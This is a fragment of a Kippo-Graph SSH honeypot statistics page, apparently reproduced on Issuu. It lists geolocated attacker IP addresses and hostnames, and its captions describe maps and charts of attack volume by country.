CN

31.045601

121.399696

247.fudan.edu.cn

264

58.51.91.54

1

Wuhan

Hubei

China

CN

30.580099

114.273399

58.51.91.54

265

54.251.223.249

1

Singapore

SG

1.3667

103.800003

ec2-54-251-223-249.ap-southeast1.compute.amazonaws.com

The following zoomable world map marks the geographic locations of the top 10 IPs according to their latitude and longitude values. Click on them to get the full information available from the database.


Map data ©2013 MapLink Imagery ©2013 NASA, TerraMetrics

The following Intensity Map shows the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.

1

5266

The following pie chart visualizes the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.

Geolocation by geoPlugin

Copyright © 2011, 2012 - All Rights Reserved - Kippo-Graph

Thanks to OS Templates


Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.